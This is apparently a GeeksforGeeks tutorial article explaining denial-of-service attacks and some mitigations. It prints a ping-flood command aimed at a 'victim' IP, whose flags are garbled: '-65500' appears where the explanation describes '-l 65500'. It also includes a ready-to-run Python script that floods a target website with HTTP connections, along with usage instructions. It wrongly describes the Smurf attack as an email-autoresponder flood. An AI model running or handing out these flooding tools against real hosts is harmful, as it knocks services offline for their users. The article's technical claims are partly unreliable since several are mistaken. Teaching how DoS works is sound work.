Deniel of Service and Prevention

2.5

Denial of Service (DoS) is a cyber-attack on an individual Computer or Website with intent to deny services to intended users.Their purpose is to disrupt an organization’s network operations by denying access to its users.Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
For example, if a bank website can handle 10 people a second clicking the Login button, an attacker only has to send 10 fake requests per second to make it so no legitimate users can login.

DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly.

It is strongly recommended to try all described activity on virtual machines rather than your working environment

Following is the command for performing flooding of request on an IP

ping ip_address –t -65500

HERE,

  • “ping” sends the data packets to the victim.
  • “ip_address” is the IP address of the victim.
  • “-t” means the data packets should be sent until the program is stopped.
  • “-l(65500)” specifies the data load to be sent to the victim.

Other basic types of DoS attacks involve

  • Flooding a network with useless activity so that genuine traffic cannot get through. The TCP/IP SYN and smurf attacks are two common examples.
  • Remotely overloading a system’s CPU so that valid requests cannot be processed.
  • Changing permissions or breaking authorization logic to prevent users from logging into a system. One common example involves triggering a rapid series of false login attempts that lock out accounts from being able to log in.
  • Deleting or interfering with specific critical applications or services to prevent their normal operation (even if the system and network overall are functional).

Another variant of the DoS is the Smurf_attack. This involves emails with automatic responses. If someone emails hundreds of email messages with a fake return email address to hundreds of people in an organization with an autoresponder on in their email, the initial sent messages can become thousands sent to the fake email address. If that fake email address actually belongs to someone, this can overwhelm that person’s account.

DoS attacks can cause the following problems:

  • Ineffective services
  • Inaccessible services
  • Interruption of network traffic
  • Connection interference

Following is the python script for performing denial of service attack for small website which didn’t expect so much socket connection

# Please note that running this code might
# cause your IP blocked by server. And purpose
# of this code is only learning.
import socket, sys, os  
print "][ Attacking " + sys.argv[1]  + " ... ]["  
print "injecting " + sys.argv[2];  
def attack():  
    #pid = os.fork()  
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    s.connect((sys.argv[1], 80))  
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  
    s.send("Host: " + sys.argv[1]  + "\r\n\r\n");  
    s.close()  

# Driver code
for i in range(1, 1000):  
    attack() 

We can use above code as

python ddos.py target_ip_address apache

Prevention

Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

  • Cloud Mitigation Provider – Cloud mitigation providers are experts at providing DDoS mitigation from the cloud. This means they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites around the Internet that can take in any type of network traffic, whether you use multiple ISP’s, your own data center or any number of cloud providers. They can scrub the traffic for you and only send “clean” traffic to your data center.
  • Firewall – This is the simplest and least effective method. Generally someone writes some Python scripts that try to filter out the bad traffic or an enterprise will try and use its existing firewalls to block the traffic
  • Internet Service Provider (ISP) – Some enterprises use their ISP to provide DDoS mitigation. These ISP’s have more bandwidth than an enterprise would, which can help with the large volumetric attacks

To safeguard from these attack you have to apply secure coding and design strong architecture which can prevent these kind of attacks and update day-to-day solution to bug of your website.

References
https://www.owasp.org/index.php/Denial_of_Service
https://en.wikipedia.org/wiki/Denial-of-service_attack

This article is contributed by Akash Sharan. If you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks main page and help other Geeks.

Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above.

GATE CS Corner    Company Wise Coding Practice

Recommended Posts:



2.5 Average Difficulty : 2.5/5.0
Based on 4 vote(s)










Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.